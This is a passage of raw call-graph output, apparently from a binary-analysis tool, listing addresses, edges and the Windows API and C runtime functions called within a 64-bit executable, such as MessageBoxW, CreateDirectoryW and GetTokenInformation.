7ff690024094 17315 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17313->17315 17317 7ff690012a54 FormatMessageW 17314->17317 17315->17312 17324 7ff690012590 17317->17324 17318 7ff690024069 17322 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17318->17322 17319 7ff6900240ba 17319->17313 17321 7ff6900240c4 17319->17321 17320 7ff690024060 17320->17313 17320->17318 17323 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17321->17323 17322->17312 17323->17312 17325 7ff6900125b5 17324->17325 17326 7ff690023ef8 48 API calls 17325->17326 17327 7ff6900125d8 MessageBoxW 17326->17327 17327->17290 17329 7ff6900222ee 17328->17329 17334 7ff6900222de 17328->17334 17330 7ff6900222f7 17329->17330 17335 7ff690022325 17329->17335 17331 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17330->17331 17332 7ff69002231d 17331->17332 17332->17313 17332->17318 17332->17319 17332->17320 17333 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17333->17332 17334->17333 17335->17332 17335->17334 17339 7ff690022cc4 17335->17339 17372 7ff690022710 17335->17372 17409 7ff690021ea0 17335->17409 17340 7ff690022d77 17339->17340 17341 7ff690022d06 17339->17341 17344 7ff690022d7c 17340->17344 17345 7ff690022dd0 17340->17345 17342 7ff690022d0c 17341->17342 17343 7ff690022da1 17341->17343 17346 7ff690022d11 17342->17346 17347 7ff690022d40 17342->17347 17432 7ff690021074 17343->17432 17348 7ff690022d7e 17344->17348 17349 7ff690022db1 17344->17349 17351 7ff690022de7 17345->17351 17353 7ff690022dda 17345->17353 17357 7ff690022ddf 17345->17357 17346->17351 17354 7ff690022d17 17346->17354 17347->17354 17347->17357 17352 7ff690022d20 17348->17352 17361 7ff690022d8d 17348->17361 17439 7ff690020c64 17349->17439 17446 7ff6900239cc 17351->17446 17370 7ff690022e10 17352->17370 17412 7ff690023478 17352->17412 17353->17343 17353->17357 17354->17352 17360 7ff690022d52 17354->17360 17368 7ff690022d3b 17354->17368 17357->17370 17450 7ff690021484 17357->17450 17360->17370 17422 7ff6900237b4 17360->17422 17361->17343 17362 7ff690022d92 17361->17362 17362->17370 17428 7ff690023878 17362->17428 17364 7ff69001b870 _log10_special 8 API calls 17365 7ff69002310a 17364->17365 17365->17335 17368->17370 17371 7ff690022ffc 17368->17371 17457 7ff690023ae0 17368->17457 17370->17364 17371->17370 17463 7ff69002dd18 17371->17463 17373 7ff69002271e 17372->17373 17374 7ff690022734 17372->17374 17375 7ff690022774 17373->17375 17377 7ff690022d77 17373->17377 17378 7ff690022d06 17373->17378 17374->17375 17376 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17374->17376 17375->17335 17376->17375 17381 7ff690022d7c 17377->17381 17382 7ff690022dd0 17377->17382 17379 7ff690022d0c 17378->17379 17380 7ff690022da1 17378->17380 17383 7ff690022d11 17379->17383 17384 7ff690022d40 17379->17384 17385 7ff690021074 38 API calls 17380->17385 17387 7ff690022db1 17381->17387 17389 7ff690022d7e 17381->17389 17386 7ff690022de7 17382->17386 17390 7ff690022dda 17382->17390 17392 7ff690022ddf 17382->17392 17383->17386 17391 7ff690022d17 17383->17391 17384->17391 17384->17392 17404 7ff690022d3b 17385->17404 17395 7ff6900239cc 45 API calls 17386->17395 17393 7ff690020c64 38 API calls 17387->17393 17388 7ff690022d20 17394 7ff690023478 47 API calls 17388->17394 17407 7ff690022e10 17388->17407 17389->17388 17397 7ff690022d8d 17389->17397 17390->17380 17390->17392 17391->17388 17398 7ff690022d52 17391->17398 17391->17404 17396 7ff690021484 38 API calls 17392->17396 17392->17407 17393->17404 17394->17404 17395->17404 17396->17404 17397->17380 17399 7ff690022d92 17397->17399 17400 7ff6900237b4 46 API calls 17398->17400 17398->17407 17402 7ff690023878 37 API calls 17399->17402 17399->17407 17400->17404 17401 7ff69001b870 _log10_special 8 API calls 17403 7ff69002310a 17401->17403 17402->17404 17403->17335 17405 7ff690023ae0 45 API calls 17404->17405 17404->17407 17408 7ff690022ffc 17404->17408 17405->17408 17406 7ff69002dd18 46 API calls 17406->17408 17407->17401 17408->17406 17408->17407 17629 7ff6900202e8 17409->17629 17413 7ff69002349e 17412->17413 17475 7ff69001fea0 17413->17475 17418 7ff6900235e3 17420 7ff690023ae0 45 API calls 17418->17420 17421 7ff690023671 17418->17421 17419 7ff690023ae0 45 API calls 17419->17418 17420->17421 17421->17368 17425 7ff6900237e9 17422->17425 17423 7ff69002382e 17423->17368 17424 7ff690023807 17427 7ff69002dd18 46 API calls 17424->17427 17425->17423 17425->17424 17426 7ff690023ae0 45 API calls 17425->17426 17426->17424 17427->17423 17431 7ff690023899 17428->17431 17429 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17430 7ff6900238ca 17429->17430 17430->17368 17431->17429 17431->17430 17434 7ff6900210a7 17432->17434 17433 7ff6900210d6 17438 7ff690021113 17433->17438 17602 7ff69001ff48 17433->17602 17434->17433 17436 7ff690021193 17434->17436 17437 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17436->17437 17437->17438 17438->17368 17440 7ff690020c97 17439->17440 17441 7ff690020cc6 17440->17441 17443 7ff690020d83 17440->17443 17442 7ff69001ff48 12 API calls 17441->17442 17445 7ff690020d03 17441->17445 17442->17445 17444 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17443->17444 17444->17445 17445->17368 17447 7ff690023a0f 17446->17447 17448 7ff690023a13 __crtLCMapStringW 17447->17448 17610 7ff690023a68 17447->17610 17448->17368 17451 7ff6900214b7 17450->17451 17452 7ff6900214e6 17451->17452 17454 7ff6900215a3 17451->17454 17453 7ff69001ff48 12 API calls 17452->17453 17456 7ff690021523 17452->17456 17453->17456 17455 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17454->17455 17455->17456 17456->17368 17458 7ff690023af7 17457->17458 17614 7ff69002ccc8 17458->17614 17465 7ff69002dd49 17463->17465 17473 7ff69002dd57 17463->17473 17464 7ff69002dd77 17467 7ff69002dd88 17464->17467 17468 7ff69002ddaf 17464->17468 17465->17464 17466 7ff690023ae0 45 API calls 17465->17466 17465->17473 17466->17464 17622 7ff69002f3b0 17467->17622 17470 7ff69002ddd9 17468->17470 17471 7ff69002de3a 17468->17471 17468->17473 17470->17473 17474 7ff69002ebb0 _fread_nolock MultiByteToWideChar 17470->17474 17472 7ff69002ebb0 _fread_nolock MultiByteToWideChar 17471->17472 17472->17473 17473->17371 17474->17473 17476 7ff69001fed7 17475->17476 17482 7ff69001fec6 17475->17482 17477 7ff69002c90c _fread_nolock 12 API calls 17476->17477 17476->17482 17478 7ff69001ff04 17477->17478 17479 7ff69001ff18 17478->17479 17480 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17478->17480 17481 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17479->17481 17480->17479 17481->17482 17483 7ff69002d880 17482->17483 17484 7ff69002d89d 17483->17484 17485 7ff69002d8d0 17483->17485 17486 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17484->17486 17485->17484 17487 7ff69002d902 17485->17487 17496 7ff6900235c1 17486->17496 17492 7ff69002da15 17487->17492 17499 7ff69002d94a 17487->17499 17488 7ff69002db07 17529 7ff69002cd6c 17488->17529 17490 7ff69002dacd 17522 7ff69002d104 17490->17522 17492->17488 17492->17490 17493 7ff69002da9c 17492->17493 17495 7ff69002da5f 17492->17495 17498 7ff69002da55 17492->17498 17515 7ff69002d3e4 17493->17515 17505 7ff69002d614 17495->17505 17496->17418 17496->17419 17498->17490 17500 7ff69002da5a 17498->17500 17499->17496 17501 7ff6900297b4 __std_exception_copy 37 API calls 17499->17501 17500->17493 17500->17495 17502 7ff69002da02 17501->17502 17502->17496 17503 7ff690029c10 _isindst 17 API calls 17502->17503 17504 7ff69002db64 17503->17504 17538 7ff6900333bc 17505->17538 17509 7ff69002d6bc 17510 7ff69002d711 17509->17510 17511 7ff69002d6dc 17509->17511 17514 7ff69002d6c0 17509->17514 17591 7ff69002d200 17510->17591 17587 7ff69002d4bc 17511->17587 17514->17496 17516 7ff6900333bc 38 API calls 17515->17516 17517 7ff69002d42e 17516->17517 17518 7ff690032e04 37 API calls 17517->17518 17519 7ff69002d47e 17518->17519 17520 7ff69002d482 17519->17520 17521 7ff69002d4bc 45 API calls 17519->17521 17520->17496 17521->17520 17523 7ff6900333bc 38 API calls 17522->17523 17524 7ff69002d14f 17523->17524 17525 7ff690032e04 37 API calls 17524->17525 17527 7ff69002d1a7 17525->17527 17526 7ff69002d1ab 17526->17496 17527->17526 17528 7ff69002d200 45 API calls 17527->17528 17528->17526 17530 7ff69002cdb1 17529->17530 17531 7ff69002cde4 17529->17531 17532 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17530->17532 17533 7ff69002cdfc 17531->17533 17535 7ff69002ce7d 17531->17535 17537 7ff69002cddd memcpy_s 17532->17537 17534 7ff69002d104 46 API calls 17533->17534 17534->17537 17536 7ff690023ae0 45 API calls 17535->17536 17535->17537 17536->17537 17537->17496 17539 7ff69003340f fegetenv 17538->17539 17540 7ff69003713c 37 API calls 17539->17540 17545 7ff690033462 17540->17545 17541 7ff69003348f 17544 7ff6900297b4 __std_exception_copy 37 API calls 17541->17544 17542 7ff690033552 17543 7ff69003713c 37 API calls 17542->17543 17546 7ff69003357c 17543->17546 17547 7ff69003350d 17544->17547 17545->17542 17548 7ff69003347d 17545->17548 17549 7ff69003352c 17545->17549 17550 7ff69003713c 37 API calls 17546->17550 17551 7ff690034634 17547->17551 17557 7ff690033515 17547->17557 17548->17541 17548->17542 17552 7ff6900297b4 __std_exception_copy 37 API calls 17549->17552 17553 7ff69003358d 17550->17553 17554 7ff690029c10 _isindst 17 API calls 17551->17554 17552->17547 17555 7ff690037330 20 API calls 17553->17555 17556 7ff690034649 17554->17556 17565 7ff6900335f6 memcpy_s 17555->17565 17558 7ff69001b870 _log10_special 8 API calls 17557->17558 17559 7ff69002d661 17558->17559 17583 7ff690032e04 17559->17583 17560 7ff69003399f memcpy_s 17561 7ff690033637 memcpy_s 17578 7ff690033f7b memcpy_s 17561->17578 17579 7ff690033a93 memcpy_s 17561->17579 17562 7ff690033cdf 17563 7ff690032f20 37 API calls 17562->17563 17569 7ff6900343f7 17563->17569 17564 7ff690033c8b 17564->17562 17566 7ff69003464c memcpy_s 37 API calls 17564->17566 17565->17560 17565->17561 17567 7ff6900243f4 memcpy_s 11 API calls 17565->17567 17566->17562 17568 7ff690033a70 17567->17568 17570 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17568->17570 17571 7ff69003464c memcpy_s 37 API calls 17569->17571 17582 7ff690034452 17569->17582 17570->17561 17571->17582 17572 7ff6900345d8 17575 7ff69003713c 37 API calls 17572->17575 17573 7ff6900243f4 11 API calls memcpy_s 17573->17578 17574 7ff6900243f4 11 API calls memcpy_s 17574->17579 17575->17557 17576 7ff690032f20 37 API calls 17576->17582 17577 7ff690029bf0 37 API calls _invalid_parameter_noinfo 17577->17578 17578->17562 17578->17564 17578->17573 17578->17577 17579->17564 17579->17574 17580 7ff690029bf0 37 API calls _invalid_parameter_noinfo 17579->17580 17580->17579 17581 7ff69003464c memcpy_s 37 API calls 17581->17582 17582->17572 17582->17576 17582->17581 17584 7ff690032e23 17583->17584 17585 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17584->17585 17586 7ff690032e4e memcpy_s 17584->17586 17585->17586 17586->17509 17588 7ff69002d4e8 memcpy_s 17587->17588 17589 7ff690023ae0 45 API calls 17588->17589 17590 7ff69002d5a2 memcpy_s 17588->17590 17589->17590 17590->17514 17592 7ff69002d23b 17591->17592 17597 7ff69002d288 memcpy_s 17591->17597 17593 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17592->17593 17594 7ff69002d267 17593->17594 17594->17514 17595 7ff69002d2f3 17596 7ff6900297b4 __std_exception_copy 37 API calls 17595->17596 17601 7ff69002d335 memcpy_s 17596->17601 17597->17595 17598 7ff690023ae0 45 API calls 17597->17598 17598->17595 17599 7ff690029c10 _isindst 17 API calls 17600 7ff69002d3e0 17599->17600 17601->17599 17603 7ff69001ff7f 17602->17603 17609 7ff69001ff6e 17602->17609 17604 7ff69002c90c _fread_nolock 12 API calls 17603->17604 17603->17609 17605 7ff69001ffb0 17604->17605 17606 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17605->17606 17608 7ff69001ffc4 17605->17608 17606->17608 17607 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17607->17609 17608->17607 17609->17438 17611 7ff690023a86 17610->17611 17612 7ff690023a8e 17610->17612 17613 7ff690023ae0 45 API calls 17611->17613 17612->17448 17613->17612 17615 7ff690023b1f 17614->17615 17616 7ff69002cce1 17614->17616 17618 7ff69002cd34 17615->17618 17616->17615 17617 7ff690032614 45 API calls 17616->17617 17617->17615 17619 7ff69002cd4d 17618->17619 17620 7ff690023b2f 17618->17620 17619->17620 17621 7ff690031960 45 API calls 17619->17621 17620->17371 17621->17620 17625 7ff690036098 17622->17625 17628 7ff6900360fc 17625->17628 17626 7ff69001b870 _log10_special 8 API calls 17627 7ff69002f3cd 17626->17627 17627->17473 17628->17626 17630 7ff69002031d 17629->17630 17631 7ff69002032f 17629->17631 17632 7ff6900243f4 memcpy_s 11 API calls 17630->17632 17633 7ff69002033d 17631->17633 17637 7ff690020379 17631->17637 17634 7ff690020322 17632->17634 17635 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17633->17635 17636 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17634->17636 17643 7ff69002032d 17635->17643 17636->17643 17638 7ff6900206f5 17637->17638 17640 7ff6900243f4 memcpy_s 11 API calls 17637->17640 17639 7ff6900243f4 memcpy_s 11 API calls 17638->17639 17638->17643 17641 7ff690020989 17639->17641 17642 7ff6900206ea 17640->17642 17644 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17641->17644 17645 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17642->17645 17643->17335 17644->17643 17645->17638 17647 7ff69001fa24 17646->17647 17676 7ff69001f784 17647->17676 17649 7ff69001fa3d 17649->17011 17688 7ff69001f6dc 17650->17688 17654 7ff69001277c 17653->17654 17655 7ff6900243f4 memcpy_s 11 API calls 17654->17655 17656 7ff690012799 17655->17656 17702 7ff690023ca4 17656->17702 17661 7ff690011bf0 49 API calls 17662 7ff690012807 17661->17662 17663 7ff6900186b0 2 API calls 17662->17663 17664 7ff69001281f 17663->17664 17665 7ff69001282c MessageBoxW 17664->17665 17666 7ff690012843 MessageBoxA 17664->17666 17667 7ff690012855 17665->17667 17666->17667 17668 7ff69001b870 _log10_special 8 API calls 17667->17668 17669 7ff690012865 17668->17669 17669->17040 17671 7ff69001f439 17670->17671 17672 7ff690011b06 17670->17672 17673 7ff6900243f4 memcpy_s 11 API calls 17671->17673 17672->17039 17672->17040 17674 7ff69001f43e 17673->17674 17675 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17674->17675 17675->17672 17677 7ff69001f7ee 17676->17677 17678 7ff69001f7ae 17676->17678 17677->17678 17680 7ff69001f7fa 17677->17680 17679 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17678->17679 17686 7ff69001f7d5 17679->17686 17687 7ff69002477c EnterCriticalSection 17680->17687 17686->17649 17689 7ff69001f706 17688->17689 17690 7ff6900119b9 17688->17690 17689->17690 17691 7ff69001f752 17689->17691 17692 7ff69001f715 memcpy_s 17689->17692 17690->17017 17690->17018 17701 7ff69002477c EnterCriticalSection 17691->17701 17694 7ff6900243f4 memcpy_s 11 API calls 17692->17694 17696 7ff69001f72a 17694->17696 17698 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17696->17698 17698->17690 17704 7ff690023cfe 17702->17704 17703 7ff690023d23 17706 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17703->17706 17704->17703 17705 7ff690023d5f 17704->17705 17732 7ff690021f30 17705->17732 17708 7ff690023d4d 17706->17708 17711 7ff69001b870 _log10_special 8 API calls 17708->17711 17709 7ff690023e3c 17710 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17709->17710 17710->17708 17713 7ff6900127d8 17711->17713 17720 7ff690024480 17713->17720 17714 7ff690023e11 17718 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17714->17718 17715 7ff690023e60 17715->17709 17717 7ff690023e6a 17715->17717 17716 7ff690023e08 17716->17709 17716->17714 17719 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17717->17719 17718->17708 17719->17708 17721 7ff69002a5d8 memcpy_s 11 API calls 17720->17721 17722 7ff690024497 17721->17722 17723 7ff6900127df 17722->17723 17724 7ff69002dea8 memcpy_s 11 API calls 17722->17724 17727 7ff6900244d7 17722->17727 17723->17661 17725 7ff6900244cc 17724->17725 17726 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17725->17726 17726->17727 17727->17723 17867 7ff69002df30 17727->17867 17730 7ff690029c10 _isindst 17 API calls 17731 7ff69002451c 17730->17731 17733 7ff690021f6e 17732->17733 17734 7ff690021f5e 17732->17734 17735 7ff690021f77 17733->17735 17742 7ff690021fa5 17733->17742 17738 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17734->17738 17736 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17735->17736 17737 7ff690021f9d 17736->17737 17737->17709 17737->17714 17737->17715 17737->17716 17738->17737 17739 7ff690023ae0 45 API calls 17739->17742 17741 7ff690022254 17744 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17741->17744 17742->17734 17742->17737 17742->17739 17742->17741 17746 7ff6900228c0 17742->17746 17772 7ff690022588 17742->17772 17802 7ff690021e10 17742->17802 17744->17734 17747 7ff690022902 17746->17747 17748 7ff690022975 17746->17748 17749 7ff690022908 17747->17749 17750 7ff69002299f 17747->17750 17751 7ff69002297a 17748->17751 17752 7ff6900229cf 17748->17752 17755 7ff69002290d 17749->17755 17756 7ff6900229de 17749->17756 17819 7ff690020e70 17750->17819 17753 7ff6900229af 17751->17753 17758 7ff69002297c 17751->17758 17752->17750 17752->17756 17770 7ff690022938 17752->17770 17826 7ff690020a60 17753->17826 17760 7ff690022950 17755->17760 17762 7ff69002291d 17755->17762 17755->17770 17771 7ff690022a0d 17756->17771 17833 7ff690021280 17756->17833 17758->17762 17763 7ff69002298b 17758->17763 17760->17771 17815 7ff6900236e0 17760->17815 17762->17771 17805 7ff690023224 17762->17805 17763->17750 17765 7ff690022990 17763->17765 17768 7ff690023878 37 API calls 17765->17768 17765->17771 17766 7ff69001b870 _log10_special 8 API calls 17767 7ff690022ca3 17766->17767 17767->17742 17768->17770 17770->17771 17840 7ff69002db68 17770->17840 17771->17766 17773 7ff6900225a9 17772->17773 17774 7ff690022593 17772->17774 17775 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17773->17775 17778 7ff6900225e7 17773->17778 17776 7ff690022902 17774->17776 17777 7ff690022975 17774->17777 17774->17778 17775->17778 17779 7ff690022908 17776->17779 17780 7ff69002299f 17776->17780 17781 7ff69002297a 17777->17781 17782 7ff6900229cf 17777->17782 17778->17742 17789 7ff69002290d 17779->17789 17793 7ff6900229de 17779->17793 17785 7ff690020e70 38 API calls 17780->17785 17783 7ff69002297c 17781->17783 17784 7ff6900229af 17781->17784 17782->17780 17782->17793 17800 7ff690022938 17782->17800 17786 7ff69002291d 17783->17786 17792 7ff69002298b 17783->17792 17787 7ff690020a60 38 API calls 17784->17787 17785->17800 17788 7ff690023224 47 API calls 17786->17788 17801 7ff690022a0d 17786->17801 17787->17800 17788->17800 17789->17786 17790 7ff690022950 17789->17790 17789->17800 17794 7ff6900236e0 47 API calls 17790->17794 17790->17801 17791 7ff690021280 38 API calls 17791->17800 17792->17780 17795 7ff690022990 17792->17795 17793->17791 17793->17801 17794->17800 17797 7ff690023878 37 API calls 17795->17797 17795->17801 17796 7ff69001b870 _log10_special 8 API calls 17798 7ff690022ca3 17796->17798 17797->17800 17798->17742 17799 7ff69002db68 47 API calls 17799->17800 17800->17799 17800->17801 17801->17796 17850 7ff690020034 17802->17850 17806 7ff690023246 17805->17806 17807 7ff69001fea0 12 API calls 17806->17807 17808 7ff69002328e 17807->17808 17809 7ff69002d880 46 API calls 17808->17809 17810 7ff690023361 17809->17810 17811 7ff690023ae0 45 API calls 17810->17811 17814 7ff690023383 17810->17814 17811->17814 17812 7ff690023ae0 45 API calls 17813 7ff69002340c 17812->17813 17813->17770 17814->17812 17814->17813 17814->17814 17816 7ff6900236f8 17815->17816 17817 7ff690023760 17815->17817 17816->17817 17818 7ff69002db68 47 API calls 17816->17818 17817->17770 17818->17817 17820 7ff690020ea3 17819->17820 17821 7ff690020ed2 17820->17821 17823 7ff690020f8f 17820->17823 17822 7ff69001fea0 12 API calls 17821->17822 17825 7ff690020f0f 17821->17825 17822->17825 17824 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17823->17824 17824->17825 17825->17770 17827 7ff690020a93 17826->17827 17828 7ff690020ac2 17827->17828 17830 7ff690020b7f 17827->17830 17829 7ff69001fea0 12 API calls 17828->17829 17832 7ff690020aff 17828->17832 17829->17832 17831 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17830->17831 17831->17832 17832->17770 17834 7ff6900212b3 17833->17834 17835 7ff6900212e2 17834->17835 17837 7ff69002139f 17834->17837 17836 7ff69001fea0 12 API calls 17835->17836 17839 7ff69002131f 17835->17839 17836->17839 17838 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17837->17838 17838->17839 17839->17770 17841 7ff69002db90 17840->17841 17842 7ff69002dbd5 17841->17842 17843 7ff690023ae0 45 API calls 17841->17843 17846 7ff69002db95 memcpy_s 17841->17846 17849 7ff69002dbbe memcpy_s 17841->17849 17845 7ff69002faf8 WideCharToMultiByte 17842->17845 17842->17846 17842->17849 17843->17842 17844 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17844->17846 17847 7ff69002dcb1 17845->17847 17846->17770 17847->17846 17848 7ff69002dcc6 GetLastError 17847->17848 17848->17846 17848->17849 17849->17844 17849->17846 17851 7ff690020061 17850->17851 17852 7ff690020073 17850->17852 17853 7ff6900243f4 memcpy_s 11 API calls 17851->17853 17855 7ff690020080 17852->17855 17858 7ff6900200bd 17852->17858 17854 7ff690020066 17853->17854 17856 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17854->17856 17857 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17855->17857 17864 7ff690020071 17856->17864 17857->17864 17859 7ff690020166 17858->17859 17860 7ff6900243f4 memcpy_s 11 API calls 17858->17860 17861 7ff6900243f4 memcpy_s 11 API calls 17859->17861 17859->17864 17862 7ff69002015b 17860->17862 17863 7ff690020210 17861->17863 17865 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17862->17865 17866 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17863->17866 17864->17742 17865->17859 17866->17864 17871 7ff69002df4d 17867->17871 17868 7ff69002df52 17869 7ff6900244fd 17868->17869 17870 7ff6900243f4 memcpy_s 11 API calls 17868->17870 17869->17723 17869->17730 17872 7ff69002df5c 17870->17872 17871->17868 17871->17869 17874 7ff69002df9c 17871->17874 17873 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17872->17873 17873->17869 17874->17869 17875 7ff6900243f4 memcpy_s 11 API calls 17874->17875 17875->17872 17877 7ff690027568 17876->17877 17878 7ff690027555 17876->17878 17886 7ff6900271cc 17877->17886 17879 7ff6900243f4 memcpy_s 11 API calls 17878->17879 17881 7ff69002755a 17879->17881 17883 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 17881->17883 17884 7ff690027566 17883->17884 17884->17058 17893 7ff69002f5e8 EnterCriticalSection 17886->17893 17895 7ff690017b91 GetTokenInformation 17894->17895 17897 7ff690017c13 __std_exception_copy 17894->17897 17896 7ff690017bb2 GetLastError 17895->17896 17898 7ff690017bbd 17895->17898 17896->17897 17896->17898 17899 7ff690017c26 CloseHandle 17897->17899 17900 7ff690017c2c 17897->17900 17898->17897 17901 7ff690017bd9 GetTokenInformation 17898->17901 17899->17900 17900->17067 17901->17897 17902 7ff690017bfc 17901->17902 17902->17897 17903 7ff690017c06 ConvertSidToStringSidW 17902->17903 17903->17897 17905 7ff69001297a 17904->17905 17906 7ff690023ef8 48 API calls 17905->17906 17907 7ff6900129a2 MessageBoxW 17906->17907 17908 7ff69001b870 _log10_special 8 API calls 17907->17908 18089 7ff690013f70 108 API calls 18088->18089 18090 7ff690011463 18089->18090 18091 7ff69001146b 18090->18091 18092 7ff69001148c 18090->18092 18094 7ff6900125f0 53 API calls 18091->18094 18093 7ff69001f9f4 73 API calls 18092->18093 18096 7ff6900114a1 18093->18096 18095 7ff69001147b 18094->18095 18095->17126 18097 7ff6900114c1 18096->18097 18098 7ff6900114a5 18096->18098 18100 7ff6900114f1 18097->18100 18101 7ff6900114d1 18097->18101 18099 7ff690012760 53 API calls 18098->18099 18111 7ff6900114bc __std_exception_copy 18099->18111 18104 7ff6900114f7 18100->18104 18109 7ff69001150a 18100->18109 18102 7ff690012760 53 API calls 18101->18102 18102->18111 18103 7ff69001f36c 74 API calls 18105 7ff690011584 18103->18105 18112 7ff6900111f0 18104->18112 18105->17126 18107 7ff69001f6bc _fread_nolock 53 API calls 18107->18109 18108 7ff690011596 18110 7ff690012760 53 API calls 18108->18110 18109->18107 18109->18108 18109->18111 18110->18111 18111->18103 18113 7ff690011248 18112->18113 18114 7ff690011277 18113->18114 18115 7ff69001124f 18113->18115 18118 7ff6900112ad 18114->18118 18119 7ff690011291 18114->18119 18116 7ff6900125f0 53 API calls 18115->18116 18117 7ff690011262 18116->18117 18117->18111 18121 7ff6900112bf 18118->18121 18124 7ff6900112db memcpy_s 18118->18124 18120 7ff690012760 53 API calls 18119->18120 18125 7ff6900112a8 __std_exception_copy 18120->18125 18122 7ff690012760 53 API calls 18121->18122 18122->18125 18123 7ff69001f6bc _fread_nolock 53 API calls 18123->18124 18124->18123 18124->18125 18128 7ff69001139f 18124->18128 18129 7ff69001f430 37 API calls 18124->18129 18130 7ff69001fdfc 18124->18130 18125->18111 18126 7ff6900125f0 53 API calls 18126->18125 18128->18126 18129->18124 18131 7ff69001fe2c 18130->18131 18134 7ff69001fb4c 18131->18134 18133 7ff69001fe4a 18133->18124 18135 7ff69001fb99 18134->18135 18136 7ff69001fb6c 18134->18136 18135->18133 18136->18135 18137 7ff69001fb76 18136->18137 18138 7ff69001fba1 18136->18138 18150 7ff690013f1a 18149->18150 18151 7ff6900186b0 2 API calls 18150->18151 18152 7ff690013f3f 18151->18152 18153 7ff69001b870 _log10_special 8 API calls 18152->18153 18154 7ff690013f67 18153->18154 18154->17150 18156 7ff69001753e 18155->18156 18157 7ff690011bf0 49 API calls 18156->18157 18160 7ff690017662 18156->18160 18164 7ff6900175c5 18157->18164 18158 7ff69001b870 _log10_special 8 API calls 18159 7ff690017693 18158->18159 18159->17150 18160->18158 18161 7ff690011bf0 49 API calls 18161->18164 18162 7ff690013f10 10 API calls 18162->18164 18163 7ff69001761b 18165 7ff6900186b0 2 API calls 18163->18165 18164->18160 18164->18161 18164->18162 18164->18163 18166 7ff690017633 CreateDirectoryW 18165->18166 18166->18160 18166->18164 18168 7ff6900115f7 18167->18168 18169 7ff6900115d3 18167->18169 18170 7ff690013f70 108 API calls 18168->18170 18256 7ff690011050 18169->18256 18172 7ff69001160b 18170->18172 18174 7ff69001163b 18172->18174 18175 7ff690011613 18172->18175 18173 7ff6900115d8 18176 7ff6900115ee 18173->18176 18179 7ff6900125f0 53 API calls 18173->18179 18178 7ff690013f70 108 API calls 18174->18178 18177 7ff690012760 53 API calls 18175->18177 18176->17150 18180 7ff69001162a 18177->18180 18181 7ff69001164f 18178->18181 18179->18176 18180->17150 18182 7ff690011657 18181->18182 18183 7ff690011671 18181->18183 18184 7ff6900125f0 53 API calls 18182->18184 18185 7ff69001f9f4 73 API calls 18183->18185 18186 7ff690011667 18184->18186 18187 7ff690011686 18185->18187 18191 7ff69001f36c 74 API calls 18186->18191 18188 7ff69001168a 18187->18188 18189 7ff6900116ab 18187->18189 18190 7ff690012760 53 API calls 18188->18190 18192 7ff6900116c9 18189->18192 18193 7ff6900116b1 18189->18193 18199 7ff6900116a1 __std_exception_copy 18190->18199 18194 7ff6900117cd 18191->18194 18197 7ff6900116eb 18192->18197 18203 7ff69001170c 18192->18203 18195 7ff6900111f0 92 API calls 18193->18195 18194->17150 18195->18199 18196 7ff69001f36c 74 API calls 18196->18186 18198 7ff690012760 53 API calls 18197->18198 18198->18199 18199->18196 18203->18199 18206 7ff69001694b 18205->18206 18208 7ff690016904 18205->18208 18206->17150 18208->18206 18295 7ff690024250 18208->18295 18210 7ff690013b51 18209->18210 18211 7ff690013e90 49 API calls 18210->18211 18212 7ff690013b8b 18211->18212 18213 7ff690013e90 49 API calls 18212->18213 18214 7ff690013b9b 18213->18214 18215 7ff690013bec 18214->18215 18216 7ff690013bbd 18214->18216 18218 7ff690013ac0 51 API calls 18215->18218 18310 7ff690013ac0 18216->18310 18219 7ff690013bea 18218->18219 18220 7ff690013c17 18219->18220 18221 7ff690013c4c 18219->18221 18317 7ff690017400 18220->18317 18222 7ff690013ac0 51 API calls 18221->18222 18224 7ff690013c70 18222->18224 18226 7ff690013ac0 51 API calls 18224->18226 18235 7ff690013cc2 18224->18235 18254 7ff690011bf0 49 API calls 18253->18254 18255 7ff690013e24 18254->18255 18255->17150 18257 7ff690013f70 108 API calls 18256->18257 18258 7ff69001108b 18257->18258 18259 7ff6900110a8 18258->18259 18260 7ff690011093 18258->18260 18262 7ff69001f9f4 73 API calls 